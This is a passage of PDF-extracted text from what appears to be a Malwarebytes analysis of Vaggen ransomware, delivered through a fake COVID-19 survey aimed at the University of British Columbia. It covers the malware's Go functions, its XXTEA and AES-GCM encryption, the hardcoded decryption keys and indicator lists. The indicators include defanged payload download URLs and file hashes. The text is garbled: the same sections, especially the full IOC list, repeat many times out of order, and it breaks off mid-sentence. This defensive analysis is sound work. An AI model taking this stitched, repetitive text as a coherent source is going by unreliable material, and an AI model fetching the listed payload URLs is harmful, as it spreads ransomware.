service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3094 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3095 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3096 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3097 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3098 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3099 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3100 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3101 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3102 of 3467\n\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3103 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3104 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3105 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3106 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3107 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3108 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3109 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3110 of 3467\n\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3111 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3112 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3113 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3114 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3115 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3116 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3117 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3118 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3119 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3120 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3121 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3122 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3123 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3124 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM 